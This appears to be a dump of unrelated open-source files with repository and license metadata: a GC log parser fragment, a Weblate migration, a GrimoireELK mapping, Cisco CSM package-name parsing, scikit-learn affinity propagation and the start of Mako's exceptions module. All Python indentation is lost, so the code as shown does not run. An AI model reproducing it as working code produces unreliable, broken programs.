#pattern = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:')
return self.__START_LINE_PATTERN.match(line) is not None
# private reader for read each line
def __reader(self, path):
log_file = open(path, 'r')
line = log_file.readline()
while line:
yield line
line = log_file.readline()
log_file.close()
yield None
'''
parse memory info to a tuple in kilobyte
eg: 1M->1M parse to (1024,1024)
2M(2M)->0B(1M) parse to (2028,2048,0,1024)
'''
def __parse_memory_info(self, info):
match = self.__MEMORY_INFO_PATTERN.match(info)
if match:
cell = match.groups()
return int(cell[0]) * self.__unit2kb(cell[1]), int(cell[2]) * self.__unit2kb(cell[3]), int(
cell[4]) * self.__unit2kb(cell[5]), int(cell[6]) * self.__unit2kb(cell[7])
match = self.__SIMPLE_MEMORY_INFO_PATTERN.match(info)
if match:
cell = match.groups()
return int(cell[0]) * self.__unit2kb(cell[1]), int(cell[2]) * self.__unit2kb(cell[3])
return None
# covert unit to KB
# M = 1024K
# G = 1024K = 1024K*1024
def __unit2kb(self, unit):
if unit == 'M':
return 1024
elif unit == 'K':
return 1
elif unit == "G":
return 1048576
else:
return 1
if __name__ == '__main__':
analyseG1Log = G1LogUtil('/home/zuojing/tmp/atw/gc.log')
analyseG1Log.analyse()
| apache-2.0 |
lem9/weblate | weblate/trans/migrations/0022_auto_20150309_0932.py | 15 | 1055 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('trans', '0021_auto_20150306_1605'),
]
operations = [
migrations.AlterField(
model_name='subproject',
name='file_format',
field=models.CharField(default=b'auto', help_text='Automatic detection might fail for some formats and is slightly slower.', max_length=50, verbose_name='File format', choices=[(b'aresource', 'Android String Resource'), (b'auto', 'Automatic detection'), (b'json', 'JSON file'), (b'php', 'PHP strings'), (b'po', 'Gettext PO file'), (b'po-mono', 'Gettext PO file (monolingual)'), (b'properties', 'Java Properties'), (b'properties-utf8', 'Java Properties (UTF-8)'), (b'resx', '.Net resource file'), (b'strings', 'OS X Strings'), (b'strings-utf8', 'OS X Strings (UTF-8)'), (b'ts', 'Qt Linguist Translation File'), (b'xliff', 'XLIFF Translation File')]),
preserve_default=True,
),
]
| gpl-3.0 |
grimoirelab/GrimoireELK | grimoire_elk/raw/confluence.py | 1 | 2288 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2019 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Alvaro del Castillo San Felix <[email protected]>
#
from .elastic import ElasticOcean
from ..elastic_mapping import Mapping as BaseMapping
class Mapping(BaseMapping):
@staticmethod
def get_elastic_mappings(es_major):
"""Get Elasticsearch mapping.
Non dynamic discovery of type for:
* data.extensions
:param es_major: major version of Elasticsearch, as string
:returns: dictionary with a key, 'items', with the mapping
"""
mapping = '''
{
"dynamic":true,
"properties": {
"data": {
"properties": {
"extensions": {
"dynamic":false,
"properties": {}
},
"ancestors": {
"properties": {
"extensions": {
"dynamic":false,
"properties": {}
}
}
},
"body": {
"dynamic":false,
"properties": {}
}
}
}
}
}
'''
return {"items": mapping}
class ConfluenceOcean(ElasticOcean):
"""Confluence Ocean feeder"""
mapping = Mapping
| gpl-3.0 |
kstaniek/csm | csmserver/horizon/package_lib.py | 1 | 18303 | # =============================================================================
#
# Copyright (c) 2013, Cisco Systems
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
# =============================================================================
import os
import re
PIE = "pie"
ACTIVE = "active"
INACTIVE = "inactive"
COMMITTED = "committed"
ACTIVE_STR = "Active Packages:"
INACTIVE_STR = "Inactive Packages:"
pkg_name = "asr9k-mgbl-px.pie-4.2.3"
nn = "disk0:asr9k-mini-px-4.2.3"
class PackageClass(object):
def __init__(self, org_package=""):
# Platform or domain
self.platform = None
# Package name
self.pkg = None
# Architecture
self.arch = None
# Release version
self.version = None
self.subversion = None
# Package format
self.format = None
# Patch/maintenance version
self.patch_ver = None
# Requires or depends on
self.requires = None
# Supersedes or overrides
self.supersedes = None
# Partition where package exists
self.partition = None
self.org_package = org_package
def __str__(self):
# FIXME: This is a hack. It needs to be recreate back string from attributes
return self.org_package.replace(".SIT_IMAGE", "", 1)
__repr__ = __str__
class NewPackage():
def __init__(self, pkg_lst_file=None):
self.inputfile = pkg_lst_file
self.pkg_named_list = get_pkgs(pkg_lst_file)
self.pkg_list = []
if self.pkg_named_list:
self._update_pkgs()
def _update_pkgs(self):
for pkg_name in self.pkg_named_list:
# Validate the package name
pkg = self.validate_offbox_xrpie_pkg(pkg_name)
if pkg:
self.pkg_list.append(pkg)
def validate_offbox_xrpie_pkg(self, pkg):
# asr9k-px-4.3.2.CSCuj61599.pie
# asr9k-mpls-px.pie-4.3.2
# asr9k-asr9000v-nV-px.pie-5.2.2
# asr9k-mcast-px.pie-5.2.2
# asr9k-asr901-nV-px.pie-5.2.2
# asr9k-mgbl-px.pie-5.2.2
# asr9k-asr903-nV-px.pie-5.2.2
#self.error("package 1",pkg)
pkg_expr_2pkg = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_2pkg_eng1 = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+\..*)\..*')
pkg_expr_2pkg_inac = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_2pkg_inac_eng = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkg_expr_2pkg_inac_noarch = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_2pkg_inac_noarch_eng = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkg_expr = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_eng = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+)')
pkg_expr_inact = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_inact_eng_noarc=re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkg_expr_2pkg_inac = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+)')
smu_expr_eng_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+.)\.(?P<PKGNAME>CSC\w+)(?P<PKGFORMAT>-)(?P<SMUVERSION>\d+\.\d+\.\d+.*)')
smu_expr_eng_int1 = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>CSC\w+)(?P<PKGFORMAT>-)(?P<SMUVERSION>.*)')
smu_expr = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>\w+)\.(?P<PKGFORMAT>\w+)')
smu_expr2 = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>\w+)-(?P<SMUVERSION>\d+\.\d+\.\d+)\.(?P<PKGFORMAT>\w+)')
smu_expr3 = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>\w+)-(?P<PKGFORMAT>\d+\.\d+\.\d+)')
pkg_expr_2pkg_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+[a-zA-Z])')
pkg_expr_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+[a-zA-Z])')
smu_expr_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGNAME>\w+)\.(?P<PKGFORMAT>\w+)')
smu_expr2_int = re.compile(
r'(?P<PLATFORM>\w+)-(?P<ARCH>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGNAME>\w+)-(?P<SMUVERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGFORMAT>\w+)')
pkg_expr_2pkg_eng = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\w+)')
pkg_expr_2pkg_eng_test = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+-\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\w+)')
pkg_expr_2pkg_sp = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+-\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\w+-\d+\.\d+\.\d+)')
pkg_expr_2pkg_sp1 = re.compile(
r'(?P<PLATFORM>\w+)(?P<PKGNAME>-)(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\w+-\d+\.\d+\.\d+)')
pkg_arch="1"
smu_ver="0"
pkgobj = PackageClass(pkg)
p = pkg_expr_2pkg_eng1.search(pkg)
if not p:
p = pkg_expr_2pkg.search(pkg)
if not p:
p = pkg_expr_2pkg_eng_test.search(pkg)
if not p:
p = pkg_expr_2pkg_sp.search(pkg)
if not p:
p = pkg_expr_2pkg_eng.search(pkg)
if not p:
p = pkg_expr_2pkg_int.search(pkg)
if not p:
p = pkg_expr_int.search(pkg)
if not p:
p = smu_expr2_int.search(pkg)
if not p:
p = pkg_expr_2pkg_inac.search(pkg)
if not p:
p = smu_expr_int.search(pkg)
if not p:
p = pkg_expr.search(pkg)
if not p:
p = smu_expr_eng_int.search(pkg)
smu_ver="1"
if not p:
p = smu_expr_eng_int1.search(pkg)
smu_ver="1"
if not p:
p = smu_expr.search(pkg)
smu_ver=0
if not p:
p = smu_expr3.search(pkg)
smu_ver=0
if not p:
p = smu_expr2.search(pkg)
smu_ver=0
if not p:
p = pkg_expr_inact.search(pkg)
smu_ver=0
if not p:
p = pkg_expr_inact_eng_noarc.search(pkg)
pkg_arch="0"
smu_ver=0
if not p:
p=pkg_expr_2pkg_inac_noarch.search(pkg)
pkg_arch="0"
smu_ver=0
if p:
if p.group("PKGFORMAT") == PIE or p.group("PKGFORMAT")== "-" or p.group("PKGFORMAT") == "1.0.0" or p.group("PKGFORMAT") == ".":
pkgobj.platform = p.group("PLATFORM")
if "SUBPKGNAME" in p.groupdict().keys():
if p.group("PKGNAME")[:8] == 'asr9000v':
packagename = p.group(
"PKGNAME")[3:] + "-" + p.group("SUBPKGNAME")
else:
packagename = p.group(
"PKGNAME") + "-" + p.group("SUBPKGNAME")
else:
packagename = p.group("PKGNAME")
pkgobj.pkg = packagename
if pkg_arch=="0":
pkgobj.arch=""
else:
if p.group("PKGFORMAT") == PIE and packagename == "services-infra":
pkgobj.arch=""
else:
pkgobj.arch = p.group("ARCH")
if p.group("PKGFORMAT") == ".":
pkgobj.format = p.group("PKGFORMAT")+p.group("PKGSUBFORMAT")
else:
pkgobj.format = p.group("PKGFORMAT")
if smu_ver=="1":
pkgobj.format = p.group("SMUVERSION")
pkgobj.version = p.group("VERSION")
return pkgobj
def validate_xrrpm_pkg(self, pkg):
pass
class OnboxPackage():
def __init__(self, pkg_lst_file=None, pkg_state=None):
self.inputfile = None
self.pkg_list = []
self.pkg_state = pkg_state
if pkg_lst_file:
self.inputfile = pkg_lst_file
self.update_pkgs()
def update_pkgs(self):
if os.path.exists(self.inputfile):
data = get_pkgs(self.inputfile)
else:
data = self.inputfile.split("\n")
start_pkg = False
if data:
for line in data:
if line.find(self.pkg_state) < 0 and not start_pkg:
continue
elif not start_pkg:
start_pkg = True
pkg_name = line.strip()
pkg = self.validate_xrpie_pkg(pkg_name)
if not pkg:
pkg = self.validate_xrrpm_pkg(pkg_name)
if pkg:
self.pkg_list.append(pkg)
def validate_xrpie_pkg(self, pkg):
# disk0:asr9k-mini-px-4.3.2
# asr9k-px-4.2.3.CSCue60194-1.0.0
# disk0:asr9k-px-5.3.1.06I.CSCub11122-1.0.0
#self.error("package",pkg)
pkg_expr_2pkg = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+.*)')
pkg_expr_2pkg_eng = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkg_expr_2pkg_inac = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_eng = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
smu_expr = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+)\.(?P<PKGNAME>\w+)-(?P<SUBVERSION>\d+\.\d+\.\d+)')
pkg_expr_int = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+[a-zA-Z])')
smu_expr_int = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGNAME>\w+)-(?P<SUBVERSION>\d+\.\d+\.\d+.\w*)')
smu_expr_internal = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<ARCH>p\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\w*)\.(?P<PKGNAME>\w+)-(?P<SUBVERSION>\d+\.\d+\.\d+)')
pkg_expr_noarch = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_noarch_eng = re.compile(
r'(?P<DISK>\w+):(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkgobj = PackageClass()
p = pkg_expr_2pkg_eng.search(pkg)
if not p:
p = pkg_expr_2pkg.search(pkg)
if not p:
p = pkg_expr_int.search(pkg)
if not p:
p = smu_expr_int.search(pkg)
if not p:
p = pkg_expr_eng.search(pkg)
if not p:
p = pkg_expr.search(pkg)
if not p:
p = smu_expr.search(pkg)
if not p:
p = smu_expr_internal.search(pkg)
if not p:
p = pkg_expr_noarch_eng.search(pkg)
if not p:
p = pkg_expr_noarch.search(pkg)
if p:
pkgobj.platform = p.group("PLATFORM")
if "SUBPKGNAME" in p.groupdict().keys():
packagename = p.group("PKGNAME") + "-" + p.group("SUBPKGNAME")
else:
packagename = p.group("PKGNAME")
pkgobj.pkg = packagename
pkgobj.partition = p.group("DISK")
try:
pkgobj.arch = p.group("ARCH")
except:
pkgobj.arch = "px"
pkgobj.version = p.group("VERSION")
if "SUBVERSION" in p.groupdict().keys():
pkgobj.subversion = p.group("SUBVERSION")
return pkgobj
def validate_xrrpm_pkg(self, pkg):
pass
# FIXME: This needs to be implemented as sets
# Packages in list1 but not in list 2
def missing_pkgs(list1, list2):
missing_lst = []
for pk1 in list1:
missing = True
for pk2 in list2:
if pk1.pkg == pk2.pkg and pk1.version == pk2.version:
missing = False
if missing:
missing_lst.append(pk1)
return missing_lst
# Packages in list2 but not in list 1
def extra_pkgs(list1, list2):
extra_lst = []
for pk2 in list2:
extra = True
for pk1 in list1:
if pk1.pkg == pk2.pkg and pk1.version == pk2.version:
extra = False
if extra:
extra_lst.append(pk2)
return extra_lst
def package_intersection(new_packages, device_packages):
"""
Produces an intersection of new packages and device packages.
"""
SMU_RE = r'CSC\D\D\d\d\d'
FP_RE = r'fp\d+'
SP_RE = r'sp\d+'
packages = []
for pk1 in new_packages:
for pk2 in device_packages:
if pk1.pkg == pk2.pkg and pk1.version == pk2.version:
if re.match(SMU_RE, pk2.pkg) or re.match(FP_RE, pk2.pkg) or \
re.match(SP_RE, pk2.pkg):
# It's a SMU format is
# disk0:asr9k-px-4.3.2.CSCuj61599-1.0.0
pkg = "%s:%s-%s-%s.%s-%s" % (
pk2.partition, pk2.platform, pk2.arch,
pk2.version, pk2.pkg, pk2.subversion
)
else:
if pk1.arch == "":
pkg = "%s:%s-%s-%s" % (
pk2.partition, pk2.platform, pk2.pkg,
pk2.version
)
else:
pkg = "%s:%s-%s-%s-%s" % (
pk2.partition, pk2.platform, pk2.pkg, pk2.arch,
pk2.version
)
packages.append(pkg)
return packages
def parse_xr_show_platform(output):
inventory = {}
lines = output.split('\n')
for line in lines:
line = line.strip()
if len(line) > 0 and line[0].isdigit():
node = line[:15].strip()
entry = {
'type': line[16:41].strip(),
'state': line[42:58].strip(),
'config_state': line[59:].strip()
}
inventory[node] = entry
return inventory
def validate_xr_node_state(inventory, device):
valid_state = [
'IOS XR RUN',
'PRESENT',
'UNPOWERED',
'READY',
'UNPOWERED',
'FAILED',
'OK',
'ADMIN DOWN',
'DISABLED'
]
for key, value in inventory.items():
if 'CPU' in key:
if value['state'] not in valid_state:
break
else:
device.store_property('inventory', inventory)
return True
return False
protocols = ['tftp', 'ftp:', 'sftp']
def get_pkgs(pkg_lst):
if isinstance(pkg_lst, list):
return pkg_lst
elif isinstance(pkg_lst, str):
fd = open(pkg_lst, "r")
pkg_names = fd.readlines()
fd.close()
pkg_list = [x for x in [p.split("#")[0].strip() for p in pkg_names if p] if x[:4] not in protocols]
if pkg_list:
pkg_list = [p for p in pkg_list if p]
return pkg_list
def get_repo(pkg_lst_file):
fd = open(pkg_lst_file, "r")
pkg_names = fd.readlines()
fd.close()
repo = [x for x in [p.split("#")[0].strip()
for p in pkg_names if p] if x[:4] in protocols]
if repo:
repo = [p for p in repo if p]
return repo[-1]
| apache-2.0 |
moutai/scikit-learn | sklearn/cluster/affinity_propagation_.py | 60 | 10688 | """Affinity Propagation clustering algorithm."""
# Author: Alexandre Gramfort [email protected]
# Gael Varoquaux [email protected]
# License: BSD 3 clause
import numpy as np
from ..base import BaseEstimator, ClusterMixin
from ..utils import as_float_array, check_array
from ..utils.validation import check_is_fitted
from ..metrics import euclidean_distances
from ..metrics import pairwise_distances_argmin
def affinity_propagation(S, preference=None, convergence_iter=15, max_iter=200,
damping=0.5, copy=True, verbose=False,
return_n_iter=False):
"""Perform Affinity Propagation Clustering of data
Read more in the :ref:`User Guide <affinity_propagation>`.
Parameters
----------
S : array-like, shape (n_samples, n_samples)
Matrix of similarities between points
preference : array-like, shape (n_samples,) or float, optional
Preferences for each point - points with larger values of
preferences are more likely to be chosen as exemplars. The number of
exemplars, i.e. of clusters, is influenced by the input preferences
value. If the preferences are not passed as arguments, they will be
set to the median of the input similarities (resulting in a moderate
number of clusters). For a smaller amount of clusters, this can be set
to the minimum value of the similarities.
convergence_iter : int, optional, default: 15
Number of iterations with no change in the number
of estimated clusters that stops the convergence.
max_iter : int, optional, default: 200
Maximum number of iterations
damping : float, optional, default: 0.5
Damping factor between 0.5 and 1.
copy : boolean, optional, default: True
If copy is False, the affinity matrix is modified inplace by the
algorithm, for memory efficiency
verbose : boolean, optional, default: False
The verbosity level
return_n_iter : bool, default False
Whether or not to return the number of iterations.
Returns
-------
cluster_centers_indices : array, shape (n_clusters,)
index of clusters centers
labels : array, shape (n_samples,)
cluster labels for each point
n_iter : int
number of iterations run. Returned only if `return_n_iter` is
set to True.
Notes
-----
See examples/cluster/plot_affinity_propagation.py for an example.
References
----------
Brendan J. Frey and Delbert Dueck, "Clustering by Passing Messages
Between Data Points", Science Feb. 2007
"""
S = as_float_array(S, copy=copy)
n_samples = S.shape[0]
if S.shape[0] != S.shape[1]:
raise ValueError("S must be a square array (shape=%s)" % repr(S.shape))
if preference is None:
preference = np.median(S)
if damping < 0.5 or damping >= 1:
raise ValueError('damping must be >= 0.5 and < 1')
random_state = np.random.RandomState(0)
# Place preference on the diagonal of S
S.flat[::(n_samples + 1)] = preference
A = np.zeros((n_samples, n_samples))
R = np.zeros((n_samples, n_samples)) # Initialize messages
# Intermediate results
tmp = np.zeros((n_samples, n_samples))
# Remove degeneracies
S += ((np.finfo(np.double).eps * S + np.finfo(np.double).tiny * 100) *
random_state.randn(n_samples, n_samples))
# Execute parallel affinity propagation updates
e = np.zeros((n_samples, convergence_iter))
ind = np.arange(n_samples)
for it in range(max_iter):
# tmp = A + S; compute responsibilities
np.add(A, S, tmp)
I = np.argmax(tmp, axis=1)
Y = tmp[ind, I] # np.max(A + S, axis=1)
tmp[ind, I] = -np.inf
Y2 = np.max(tmp, axis=1)
# tmp = Rnew
np.subtract(S, Y[:, None], tmp)
tmp[ind, I] = S[ind, I] - Y2
# Damping
tmp *= 1 - damping
R *= damping
R += tmp
# tmp = Rp; compute availabilities
np.maximum(R, 0, tmp)
tmp.flat[::n_samples + 1] = R.flat[::n_samples + 1]
# tmp = -Anew
tmp -= np.sum(tmp, axis=0)
dA = np.diag(tmp).copy()
tmp.clip(0, np.inf, tmp)
tmp.flat[::n_samples + 1] = dA
# Damping
tmp *= 1 - damping
A *= damping
A -= tmp
# Check for convergence
E = (np.diag(A) + np.diag(R)) > 0
e[:, it % convergence_iter] = E
K = np.sum(E, axis=0)
if it >= convergence_iter:
se = np.sum(e, axis=1)
unconverged = (np.sum((se == convergence_iter) + (se == 0))
!= n_samples)
if (not unconverged and (K > 0)) or (it == max_iter):
if verbose:
print("Converged after %d iterations." % it)
break
else:
if verbose:
print("Did not converge")
I = np.where(np.diag(A + R) > 0)[0]
K = I.size # Identify exemplars
if K > 0:
c = np.argmax(S[:, I], axis=1)
c[I] = np.arange(K) # Identify clusters
# Refine the final set of exemplars and clusters and return results
for k in range(K):
ii = np.where(c == k)[0]
j = np.argmax(np.sum(S[ii[:, np.newaxis], ii], axis=0))
I[k] = ii[j]
c = np.argmax(S[:, I], axis=1)
c[I] = np.arange(K)
labels = I[c]
# Reduce labels to a sorted, gapless, list
cluster_centers_indices = np.unique(labels)
labels = np.searchsorted(cluster_centers_indices, labels)
else:
labels = np.empty((n_samples, 1))
cluster_centers_indices = None
labels.fill(np.nan)
if return_n_iter:
return cluster_centers_indices, labels, it + 1
else:
return cluster_centers_indices, labels
###############################################################################
class AffinityPropagation(BaseEstimator, ClusterMixin):
"""Perform Affinity Propagation Clustering of data.
Read more in the :ref:`User Guide <affinity_propagation>`.
Parameters
----------
damping : float, optional, default: 0.5
Damping factor between 0.5 and 1.
convergence_iter : int, optional, default: 15
Number of iterations with no change in the number
of estimated clusters that stops the convergence.
max_iter : int, optional, default: 200
Maximum number of iterations.
copy : boolean, optional, default: True
Make a copy of input data.
preference : array-like, shape (n_samples,) or float, optional
Preferences for each point - points with larger values of
preferences are more likely to be chosen as exemplars. The number
of exemplars, ie of clusters, is influenced by the input
preferences value. If the preferences are not passed as arguments,
they will be set to the median of the input similarities.
affinity : string, optional, default=``euclidean``
Which affinity to use. At the moment ``precomputed`` and
``euclidean`` are supported. ``euclidean`` uses the
negative squared euclidean distance between points.
verbose : boolean, optional, default: False
Whether to be verbose.
Attributes
----------
cluster_centers_indices_ : array, shape (n_clusters,)
Indices of cluster centers
cluster_centers_ : array, shape (n_clusters, n_features)
Cluster centers (if affinity != ``precomputed``).
labels_ : array, shape (n_samples,)
Labels of each point
affinity_matrix_ : array, shape (n_samples, n_samples)
Stores the affinity matrix used in ``fit``.
n_iter_ : int
Number of iterations taken to converge.
Notes
-----
See examples/cluster/plot_affinity_propagation.py for an example.
The algorithmic complexity of affinity propagation is quadratic
in the number of points.
References
----------
Brendan J. Frey and Delbert Dueck, "Clustering by Passing Messages
Between Data Points", Science Feb. 2007
"""
def __init__(self, damping=.5, max_iter=200, convergence_iter=15,
copy=True, preference=None, affinity='euclidean',
verbose=False):
self.damping = damping
self.max_iter = max_iter
self.convergence_iter = convergence_iter
self.copy = copy
self.verbose = verbose
self.preference = preference
self.affinity = affinity
@property
def _pairwise(self):
return self.affinity == "precomputed"
def fit(self, X, y=None):
""" Create affinity matrix from negative euclidean distances, then
apply affinity propagation clustering.
Parameters
----------
X: array-like, shape (n_samples, n_features) or (n_samples, n_samples)
Data matrix or, if affinity is ``precomputed``, matrix of
similarities / affinities.
"""
X = check_array(X, accept_sparse='csr')
if self.affinity == "precomputed":
self.affinity_matrix_ = X
elif self.affinity == "euclidean":
self.affinity_matrix_ = -euclidean_distances(X, squared=True)
else:
raise ValueError("Affinity must be 'precomputed' or "
"'euclidean'. Got %s instead"
% str(self.affinity))
self.cluster_centers_indices_, self.labels_, self.n_iter_ = \
affinity_propagation(
self.affinity_matrix_, self.preference, max_iter=self.max_iter,
convergence_iter=self.convergence_iter, damping=self.damping,
copy=self.copy, verbose=self.verbose, return_n_iter=True)
if self.affinity != "precomputed":
self.cluster_centers_ = X[self.cluster_centers_indices_].copy()
return self
def predict(self, X):
"""Predict the closest cluster each sample in X belongs to.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
New data to predict.
Returns
-------
labels : array, shape (n_samples,)
Index of the cluster each sample belongs to.
"""
check_is_fitted(self, "cluster_centers_indices_")
if not hasattr(self, "cluster_centers_"):
raise ValueError("Predict method is not supported when "
"affinity='precomputed'.")
return pairwise_distances_argmin(X, self.cluster_centers_)
| bsd-3-clause |
gdubost1/shaderman | mako/exceptions.py | 5 | 9031 | # exceptions.py
# Copyright (C) 2006, 2007 Michael Bayer [email protected]
#
# This module is part of Mako and is released under
